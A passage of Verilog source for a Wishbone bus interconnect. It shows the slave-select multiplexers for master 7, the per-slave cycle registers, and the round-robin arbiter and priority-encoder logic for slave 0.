            m7_slv_sel = m7_addr_i[( m7_aw - 1 ):( m7_aw - 4 )];
        end
    end
    always @ (  m7_slv_sel or  s0_m7_data_o or  s1_m7_data_o or  s2_m7_data_o or  s3_m7_data_o or  s4_m7_data_o or  s5_m7_data_o or  s6_m7_data_o or  s7_m7_data_o or  s8_m7_data_o or  s9_m7_data_o or  s10_m7_data_o or  s11_m7_data_o or  s12_m7_data_o or  s13_m7_data_o or  s14_m7_data_o or  s15_m7_data_o)
    begin
        case ( m7_slv_sel ) 
        4'd0:
        begin
            m7_wb_data_o = s0_m7_data_o;
        end
        4'd1:
        begin
            m7_wb_data_o = s1_m7_data_o;
        end
        4'd2:
        begin
            m7_wb_data_o = s2_m7_data_o;
        end
        4'd3:
        begin
            m7_wb_data_o = s3_m7_data_o;
        end
        4'd4:
        begin
            m7_wb_data_o = s4_m7_data_o;
        end
        4'd5:
        begin
            m7_wb_data_o = s5_m7_data_o;
        end
        4'd6:
        begin
            m7_wb_data_o = s6_m7_data_o;
        end
        4'd7:
        begin
            m7_wb_data_o = s7_m7_data_o;
        end
        4'd8:
        begin
            m7_wb_data_o = s8_m7_data_o;
        end
        4'd9:
        begin
            m7_wb_data_o = s9_m7_data_o;
        end
        4'd10:
        begin
            m7_wb_data_o = s10_m7_data_o;
        end
        4'd11:
        begin
            m7_wb_data_o = s11_m7_data_o;
        end
        4'd12:
        begin
            m7_wb_data_o = s12_m7_data_o;
        end
        4'd13:
        begin
            m7_wb_data_o = s13_m7_data_o;
        end
        4'd14:
        begin
            m7_wb_data_o = s14_m7_data_o;
        end
        4'd15:
        begin
            m7_wb_data_o = s15_m7_data_o;
        end
        endcase
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m7_s0_cyc_o <= 1'b0;
        end
        else
        begin 
            m7_s0_cyc_o <= ( ( ( m7_cyc_i &  !( m7_stb_i) ) ) ? ( m7_s0_cyc_o ) : ( ( ( ( m7_slv_sel == 4'd0 ) ) ? ( m7_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m7_s1_cyc_o <= 1'b0;
        end
        else
        begin 
            m7_s1_cyc_o <= ( ( ( m7_cyc_i &  !( m7_stb_i) ) ) ? ( m7_s1_cyc_o ) : ( ( ( ( m7_slv_sel == 4'd1 ) ) ? ( m7_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m7_s2_cyc_o <= 1'b0;
        end
        else
        begin 
            m7_s2_cyc_o <= ( ( ( m7_cyc_i &  !( m7_stb_i) ) ) ? ( m7_s2_cyc_o ) : ( ( ( ( m7_slv_sel == 4'd2 ) ) ? ( m7_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m7_s3_cyc_o <= 1'b0;
        end
        else
        begin 
            m7_s3_cyc_o <= ( ( ( m7_cyc_i &  !( m7_stb_i) ) ) ? ( m7_s3_cyc_o ) : ( ( ( ( m7_slv_sel == 4'd3 ) ) ? ( m7_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m7_s4_cyc_o <= 1'b0;
        end
        else
        begin 
            m7_s4_cyc_o <= ( ( ( m7_cyc_i &  !( m7_stb_i) ) ) ? ( m7_s4_cyc_o ) : ( ( ( ( m7_slv_sel == 4'd4 ) ) ? ( m7_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m7_s5_cyc_o <= 1'b0;
        end
        else
        begin 
            m7_s5_cyc_o <= ( ( ( m7_cyc_i &  !( m7_stb_i) ) ) ? ( m7_s5_cyc_o ) : ( ( ( ( m7_slv_sel == 4'd5 ) ) ? ( m7_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m7_s6_cyc_o <= 1'b0;
        end
        else
        begin 
            m7_s6_cyc_o <= ( ( ( m7_cyc_i &  !( m7_stb_i) ) ) ? ( m7_s6_cyc_o ) : ( ( ( ( m7_slv_sel == 4'd6 ) ) ? ( m7_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m7_s7_cyc_o <= 1'b0;
        end
        else
        begin 
            m7_s7_cyc_o <= ( ( ( m7_cyc_i &  !( m7_stb_i) ) ) ? ( m7_s7_cyc_o ) : ( ( ( ( m7_slv_sel == 4'd7 ) ) ? ( m7_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m7_s8_cyc_o <= 1'b0;
        end
        else
        begin 
            m7_s8_cyc_o <= ( ( ( m7_cyc_i &  !( m7_stb_i) ) ) ? ( m7_s8_cyc_o ) : ( ( ( ( m7_slv_sel == 4'd8 ) ) ? ( m7_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m7_s9_cyc_o <= 1'b0;
        end
        else
        begin 
            m7_s9_cyc_o <= ( ( ( m7_cyc_i &  !( m7_stb_i) ) ) ? ( m7_s9_cyc_o ) : ( ( ( ( m7_slv_sel == 4'd9 ) ) ? ( m7_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m7_s10_cyc_o <= 1'b0;
        end
        else
        begin 
            m7_s10_cyc_o <= ( ( ( m7_cyc_i &  !( m7_stb_i) ) ) ? ( m7_s10_cyc_o ) : ( ( ( ( m7_slv_sel == 4'd10 ) ) ? ( m7_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m7_s11_cyc_o <= 1'b0;
        end
        else
        begin 
            m7_s11_cyc_o <= ( ( ( m7_cyc_i &  !( m7_stb_i) ) ) ? ( m7_s11_cyc_o ) : ( ( ( ( m7_slv_sel == 4'd11 ) ) ? ( m7_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m7_s12_cyc_o <= 1'b0;
        end
        else
        begin 
            m7_s12_cyc_o <= ( ( ( m7_cyc_i &  !( m7_stb_i) ) ) ? ( m7_s12_cyc_o ) : ( ( ( ( m7_slv_sel == 4'd12 ) ) ? ( m7_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m7_s13_cyc_o <= 1'b0;
        end
        else
        begin 
            m7_s13_cyc_o <= ( ( ( m7_cyc_i &  !( m7_stb_i) ) ) ? ( m7_s13_cyc_o ) : ( ( ( ( m7_slv_sel == 4'd13 ) ) ? ( m7_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m7_s14_cyc_o <= 1'b0;
        end
        else
        begin 
            m7_s14_cyc_o <= ( ( ( m7_cyc_i &  !( m7_stb_i) ) ) ? ( m7_s14_cyc_o ) : ( ( ( ( m7_slv_sel == 4'd14 ) ) ? ( m7_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m7_s15_cyc_o <= 1'b0;
        end
        else
        begin 
            m7_s15_cyc_o <= ( ( ( m7_cyc_i &  !( m7_stb_i) ) ) ? ( m7_s15_cyc_o ) : ( ( ( ( m7_slv_sel == 4'd15 ) ) ? ( m7_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  m7_slv_sel or  s0_m7_ack_o or  s1_m7_ack_o or  s2_m7_ack_o or  s3_m7_ack_o or  s4_m7_ack_o or  s5_m7_ack_o or  s6_m7_ack_o or  s7_m7_ack_o or  s8_m7_ack_o or  s9_m7_ack_o or  s10_m7_ack_o or  s11_m7_ack_o or  s12_m7_ack_o or  s13_m7_ack_o or  s14_m7_ack_o or  s15_m7_ack_o)
    begin
        case ( m7_slv_sel ) 
        4'd0:
        begin
            m7_wb_ack_o = s0_m7_ack_o;
        end
        4'd1:
        begin
            m7_wb_ack_o = s1_m7_ack_o;
        end
        4'd2:
        begin
            m7_wb_ack_o = s2_m7_ack_o;
        end
        4'd3:
        begin
            m7_wb_ack_o = s3_m7_ack_o;
        end
        4'd4:
        begin
            m7_wb_ack_o = s4_m7_ack_o;
        end
        4'd5:
        begin
            m7_wb_ack_o = s5_m7_ack_o;
        end
        4'd6:
        begin
            m7_wb_ack_o = s6_m7_ack_o;
        end
        4'd7:
        begin
            m7_wb_ack_o = s7_m7_ack_o;
        end
        4'd8:
        begin
            m7_wb_ack_o = s8_m7_ack_o;
        end
        4'd9:
        begin
            m7_wb_ack_o = s9_m7_ack_o;
        end
        4'd10:
        begin
            m7_wb_ack_o = s10_m7_ack_o;
        end
        4'd11:
        begin
            m7_wb_ack_o = s11_m7_ack_o;
        end
        4'd12:
        begin
            m7_wb_ack_o = s12_m7_ack_o;
        end
        4'd13:
        begin
            m7_wb_ack_o = s13_m7_ack_o;
        end
        4'd14:
        begin
            m7_wb_ack_o = s14_m7_ack_o;
        end
        4'd15:
        begin
            m7_wb_ack_o = s15_m7_ack_o;
        end
        endcase
    end
    always @ (  m7_slv_sel or  s0_m7_err_o or  s1_m7_err_o or  s2_m7_err_o or  s3_m7_err_o or  s4_m7_err_o or  s5_m7_err_o or  s6_m7_err_o or  s7_m7_err_o or  s8_m7_err_o or  s9_m7_err_o or  s10_m7_err_o or  s11_m7_err_o or  s12_m7_err_o or  s13_m7_err_o or  s14_m7_err_o or  s15_m7_err_o)
    begin
        case ( m7_slv_sel ) 
        4'd0:
        begin
            m7_wb_err_o = s0_m7_err_o;
        end
        4'd1:
        begin
            m7_wb_err_o = s1_m7_err_o;
        end
        4'd2:
        begin
            m7_wb_err_o = s2_m7_err_o;
        end
        4'd3:
        begin
            m7_wb_err_o = s3_m7_err_o;
        end
        4'd4:
        begin
            m7_wb_err_o = s4_m7_err_o;
        end
        4'd5:
        begin
            m7_wb_err_o = s5_m7_err_o;
        end
        4'd6:
        begin
            m7_wb_err_o = s6_m7_err_o;
        end
        4'd7:
        begin
            m7_wb_err_o = s7_m7_err_o;
        end
        4'd8:
        begin
            m7_wb_err_o = s8_m7_err_o;
        end
        4'd9:
        begin
            m7_wb_err_o = s9_m7_err_o;
        end
        4'd10:
        begin
            m7_wb_err_o = s10_m7_err_o;
        end
        4'd11:
        begin
            m7_wb_err_o = s11_m7_err_o;
        end
        4'd12:
        begin
            m7_wb_err_o = s12_m7_err_o;
        end
        4'd13:
        begin
            m7_wb_err_o = s13_m7_err_o;
        end
        4'd14:
        begin
            m7_wb_err_o = s14_m7_err_o;
        end
        4'd15:
        begin
            m7_wb_err_o = s15_m7_err_o;
        end
        endcase
    end
    always @ (  m7_slv_sel or  s0_m7_rty_o or  s1_m7_rty_o or  s2_m7_rty_o or  s3_m7_rty_o or  s4_m7_rty_o or  s5_m7_rty_o or  s6_m7_rty_o or  s7_m7_rty_o or  s8_m7_rty_o or  s9_m7_rty_o or  s10_m7_rty_o or  s11_m7_rty_o or  s12_m7_rty_o or  s13_m7_rty_o or  s14_m7_rty_o or  s15_m7_rty_o)
    begin
        case ( m7_slv_sel ) 
        4'd0:
        begin
            m7_wb_rty_o = s0_m7_rty_o;
        end
        4'd1:
        begin
            m7_wb_rty_o = s1_m7_rty_o;
        end
        4'd2:
        begin
            m7_wb_rty_o = s2_m7_rty_o;
        end
        4'd3:
        begin
            m7_wb_rty_o = s3_m7_rty_o;
        end
        4'd4:
        begin
            m7_wb_rty_o = s4_m7_rty_o;
        end
        4'd5:
        begin
            m7_wb_rty_o = s5_m7_rty_o;
        end
        4'd6:
        begin
            m7_wb_rty_o = s6_m7_rty_o;
        end
        4'd7:
        begin
            m7_wb_rty_o = s7_m7_rty_o;
        end
        4'd8:
        begin
            m7_wb_rty_o = s8_m7_rty_o;
        end
        4'd9:
        begin
            m7_wb_rty_o = s9_m7_rty_o;
        end
        4'd10:
        begin
            m7_wb_rty_o = s10_m7_rty_o;
        end
        4'd11:
        begin
            m7_wb_rty_o = s11_m7_rty_o;
        end
        4'd12:
        begin
            m7_wb_rty_o = s12_m7_rty_o;
        end
        4'd13:
        begin
            m7_wb_rty_o = s13_m7_rty_o;
        end
        4'd14:
        begin
            m7_wb_rty_o = s14_m7_rty_o;
        end
        4'd15:
        begin
            m7_wb_rty_o = s15_m7_rty_o;
        end
        endcase
    end
    assign s0_wb_data_i = s0_data_i;
    assign s0_data_o = s0_wb_data_o;
    assign s0_addr_o = s0_wb_addr_o;
    assign s0_sel_o = s0_wb_sel_o;
    assign s0_we_o = s0_wb_we_o;
    assign s0_cyc_o = s0_wb_cyc_o;
    assign s0_stb_o = s0_wb_stb_o;
    assign s0_wb_ack_i = s0_ack_i;
    assign s0_wb_err_i = s0_err_i;
    assign s0_wb_rty_i = s0_rty_i;
    always @ (  posedge clk_i)
    begin
        s0_next <=  ~( s0_wb_cyc_o);
    end
    assign s0_arb_req = { m7_s0_cyc_o, m6_s0_cyc_o, m5_s0_cyc_o, m4_s0_cyc_o, m3_s0_cyc_o, m2_s0_cyc_o, m1_s0_cyc_o, m0_s0_cyc_o };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s0_arb_state <= s0_arb_grant0;
        end
        else
        begin 
            s0_arb_state <= s0_arb_next_state;
        end
    end
    always @ (  s0_arb_state or  { m7_s0_cyc_o, m6_s0_cyc_o, m5_s0_cyc_o, m4_s0_cyc_o, m3_s0_cyc_o, m2_s0_cyc_o, m1_s0_cyc_o, m0_s0_cyc_o } or  1'b0)
    begin
        s0_arb_next_state = s0_arb_state;
        case ( s0_arb_state ) 
        s0_arb_grant0:
        begin
            if (  !( s0_arb_req[0]) | 1'b0 ) 
            begin
                if ( s0_arb_req[1] ) 
                begin
                    s0_arb_next_state = s0_arb_grant1;
                end
                else
                begin 
                    if ( s0_arb_req[2] ) 
                    begin
                        s0_arb_next_state = s0_arb_grant2;
                    end
                    else
                    begin 
                        if ( s0_arb_req[3] ) 
                        begin
                            s0_arb_next_state = s0_arb_grant3;
                        end
                        else
                        begin 
                            if ( s0_arb_req[4] ) 
                            begin
                                s0_arb_next_state = s0_arb_grant4;
                            end
                            else
                            begin 
                                if ( s0_arb_req[5] ) 
                                begin
                                    s0_arb_next_state = s0_arb_grant5;
                                end
                                else
                                begin 
                                    if ( s0_arb_req[6] ) 
                                    begin
                                        s0_arb_next_state = s0_arb_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s0_arb_req[7] ) 
                                        begin
                                            s0_arb_next_state = s0_arb_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s0_arb_grant1:
        begin
            if (  !( s0_arb_req[1]) | 1'b0 ) 
            begin
                if ( s0_arb_req[2] ) 
                begin
                    s0_arb_next_state = s0_arb_grant2;
                end
                else
                begin 
                    if ( s0_arb_req[3] ) 
                    begin
                        s0_arb_next_state = s0_arb_grant3;
                    end
                    else
                    begin 
                        if ( s0_arb_req[4] ) 
                        begin
                            s0_arb_next_state = s0_arb_grant4;
                        end
                        else
                        begin 
                            if ( s0_arb_req[5] ) 
                            begin
                                s0_arb_next_state = s0_arb_grant5;
                            end
                            else
                            begin 
                                if ( s0_arb_req[6] ) 
                                begin
                                    s0_arb_next_state = s0_arb_grant6;
                                end
                                else
                                begin 
                                    if ( s0_arb_req[7] ) 
                                    begin
                                        s0_arb_next_state = s0_arb_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s0_arb_req[0] ) 
                                        begin
                                            s0_arb_next_state = s0_arb_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s0_arb_grant2:
        begin
            if (  !( s0_arb_req[2]) | 1'b0 ) 
            begin
                if ( s0_arb_req[3] ) 
                begin
                    s0_arb_next_state = s0_arb_grant3;
                end
                else
                begin 
                    if ( s0_arb_req[4] ) 
                    begin
                        s0_arb_next_state = s0_arb_grant4;
                    end
                    else
                    begin 
                        if ( s0_arb_req[5] ) 
                        begin
                            s0_arb_next_state = s0_arb_grant5;
                        end
                        else
                        begin 
                            if ( s0_arb_req[6] ) 
                            begin
                                s0_arb_next_state = s0_arb_grant6;
                            end
                            else
                            begin 
                                if ( s0_arb_req[7] ) 
                                begin
                                    s0_arb_next_state = s0_arb_grant7;
                                end
                                else
                                begin 
                                    if ( s0_arb_req[0] ) 
                                    begin
                                        s0_arb_next_state = s0_arb_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s0_arb_req[1] ) 
                                        begin
                                            s0_arb_next_state = s0_arb_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s0_arb_grant3:
        begin
            if (  !( s0_arb_req[3]) | 1'b0 ) 
            begin
                if ( s0_arb_req[4] ) 
                begin
                    s0_arb_next_state = s0_arb_grant4;
                end
                else
                begin 
                    if ( s0_arb_req[5] ) 
                    begin
                        s0_arb_next_state = s0_arb_grant5;
                    end
                    else
                    begin 
                        if ( s0_arb_req[6] ) 
                        begin
                            s0_arb_next_state = s0_arb_grant6;
                        end
                        else
                        begin 
                            if ( s0_arb_req[7] ) 
                            begin
                                s0_arb_next_state = s0_arb_grant7;
                            end
                            else
                            begin 
                                if ( s0_arb_req[0] ) 
                                begin
                                    s0_arb_next_state = s0_arb_grant0;
                                end
                                else
                                begin 
                                    if ( s0_arb_req[1] ) 
                                    begin
                                        s0_arb_next_state = s0_arb_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s0_arb_req[2] ) 
                                        begin
                                            s0_arb_next_state = s0_arb_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s0_arb_grant4:
        begin
            if (  !( s0_arb_req[4]) | 1'b0 ) 
            begin
                if ( s0_arb_req[5] ) 
                begin
                    s0_arb_next_state = s0_arb_grant5;
                end
                else
                begin 
                    if ( s0_arb_req[6] ) 
                    begin
                        s0_arb_next_state = s0_arb_grant6;
                    end
                    else
                    begin 
                        if ( s0_arb_req[7] ) 
                        begin
                            s0_arb_next_state = s0_arb_grant7;
                        end
                        else
                        begin 
                            if ( s0_arb_req[0] ) 
                            begin
                                s0_arb_next_state = s0_arb_grant0;
                            end
                            else
                            begin 
                                if ( s0_arb_req[1] ) 
                                begin
                                    s0_arb_next_state = s0_arb_grant1;
                                end
                                else
                                begin 
                                    if ( s0_arb_req[2] ) 
                                    begin
                                        s0_arb_next_state = s0_arb_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s0_arb_req[3] ) 
                                        begin
                                            s0_arb_next_state = s0_arb_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s0_arb_grant5:
        begin
            if (  !( s0_arb_req[5]) | 1'b0 ) 
            begin
                if ( s0_arb_req[6] ) 
                begin
                    s0_arb_next_state = s0_arb_grant6;
                end
                else
                begin 
                    if ( s0_arb_req[7] ) 
                    begin
                        s0_arb_next_state = s0_arb_grant7;
                    end
                    else
                    begin 
                        if ( s0_arb_req[0] ) 
                        begin
                            s0_arb_next_state = s0_arb_grant0;
                        end
                        else
                        begin 
                            if ( s0_arb_req[1] ) 
                            begin
                                s0_arb_next_state = s0_arb_grant1;
                            end
                            else
                            begin 
                                if ( s0_arb_req[2] ) 
                                begin
                                    s0_arb_next_state = s0_arb_grant2;
                                end
                                else
                                begin 
                                    if ( s0_arb_req[3] ) 
                                    begin
                                        s0_arb_next_state = s0_arb_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s0_arb_req[4] ) 
                                        begin
                                            s0_arb_next_state = s0_arb_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s0_arb_grant6:
        begin
            if (  !( s0_arb_req[6]) | 1'b0 ) 
            begin
                if ( s0_arb_req[7] ) 
                begin
                    s0_arb_next_state = s0_arb_grant7;
                end
                else
                begin 
                    if ( s0_arb_req[0] ) 
                    begin
                        s0_arb_next_state = s0_arb_grant0;
                    end
                    else
                    begin 
                        if ( s0_arb_req[1] ) 
                        begin
                            s0_arb_next_state = s0_arb_grant1;
                        end
                        else
                        begin 
                            if ( s0_arb_req[2] ) 
                            begin
                                s0_arb_next_state = s0_arb_grant2;
                            end
                            else
                            begin 
                                if ( s0_arb_req[3] ) 
                                begin
                                    s0_arb_next_state = s0_arb_grant3;
                                end
                                else
                                begin 
                                    if ( s0_arb_req[4] ) 
                                    begin
                                        s0_arb_next_state = s0_arb_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s0_arb_req[5] ) 
                                        begin
                                            s0_arb_next_state = s0_arb_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s0_arb_grant7:
        begin
            if (  !( s0_arb_req[7]) | 1'b0 ) 
            begin
                if ( s0_arb_req[0] ) 
                begin
                    s0_arb_next_state = s0_arb_grant0;
                end
                else
                begin 
                    if ( s0_arb_req[1] ) 
                    begin
                        s0_arb_next_state = s0_arb_grant1;
                    end
                    else
                    begin 
                        if ( s0_arb_req[2] ) 
                        begin
                            s0_arb_next_state = s0_arb_grant2;
                        end
                        else
                        begin 
                            if ( s0_arb_req[3] ) 
                            begin
                                s0_arb_next_state = s0_arb_grant3;
                            end
                            else
                            begin 
                                if ( s0_arb_req[4] ) 
                                begin
                                    s0_arb_next_state = s0_arb_grant4;
                                end
                                else
                                begin 
                                    if ( s0_arb_req[5] ) 
                                    begin
                                        s0_arb_next_state = s0_arb_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s0_arb_req[6] ) 
                                        begin
                                            s0_arb_next_state = s0_arb_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s0_msel_req = { m7_s0_cyc_o, m6_s0_cyc_o, m5_s0_cyc_o, m4_s0_cyc_o, m3_s0_cyc_o, m2_s0_cyc_o, m1_s0_cyc_o, m0_s0_cyc_o };
    assign s0_msel_pri_enc_valid = { m7_s0_cyc_o, m6_s0_cyc_o, m5_s0_cyc_o, m4_s0_cyc_o, m3_s0_cyc_o, m2_s0_cyc_o, m1_s0_cyc_o, m0_s0_cyc_o };
    always @ (  s0_msel_pri_enc_valid[0] or  { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[1] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[0] ) ) })
    begin
        if (  !( s0_msel_pri_enc_valid[0]) ) 
        begin
            s0_msel_pri_enc_pd0_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[1] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[0] ) ) } == 2'h0 ) 
            begin
                s0_msel_pri_enc_pd0_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[1] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[0] ) ) } == 2'h1 ) 
                begin
                    s0_msel_pri_enc_pd0_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[1] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[0] ) ) } == 2'h2 ) 
                    begin
                        s0_msel_pri_enc_pd0_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s0_msel_pri_enc_pd0_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s0_msel_pri_enc_valid[0] or  { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[1] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[0] ) ) })
    begin
        if (  !( s0_msel_pri_enc_valid[0]) ) 
        begin
            s0_msel_pri_enc_pd0_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[1] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[0] ) ) } == 2'h0 ) 
            begin
                s0_msel_pri_enc_pd0_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s0_msel_pri_enc_pd0_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s0_msel_pri_enc_valid[1] or  { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[3] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[2] ) ) })
    begin
        if (  !( s0_msel_pri_enc_valid[1]) ) 
        begin
            s0_msel_pri_enc_pd1_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[3] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[2] ) ) } == 2'h0 ) 
            begin
                s0_msel_pri_enc_pd1_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[3] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[2] ) ) } == 2'h1 ) 
                begin
                    s0_msel_pri_enc_pd1_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[3] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[2] ) ) } == 2'h2 ) 
                    begin
                        s0_msel_pri_enc_pd1_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s0_msel_pri_enc_pd1_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s0_msel_pri_enc_valid[1] or  { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[3] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[2] ) ) })
    begin
        if (  !( s0_msel_pri_enc_valid[1]) ) 
        begin
            s0_msel_pri_enc_pd1_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[3] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[2] ) ) } == 2'h0 ) 
            begin
                s0_msel_pri_enc_pd1_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s0_msel_pri_enc_pd1_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s0_msel_pri_enc_valid[2] or  { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[5] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[4] ) ) })
    begin
        if (  !( s0_msel_pri_enc_valid[2]) ) 
        begin
            s0_msel_pri_enc_pd2_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[5] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[4] ) ) } == 2'h0 ) 
            begin
                s0_msel_pri_enc_pd2_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[5] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[4] ) ) } == 2'h1 ) 
                begin
                    s0_msel_pri_enc_pd2_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[5] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[4] ) ) } == 2'h2 ) 
                    begin
                        s0_msel_pri_enc_pd2_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s0_msel_pri_enc_pd2_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s0_msel_pri_enc_valid[2] or  { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[5] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[4] ) ) })
    begin
        if (  !( s0_msel_pri_enc_valid[2]) ) 
        begin
            s0_msel_pri_enc_pd2_pri_out_d0 = 4'b0001;
        end
        else
        begin 
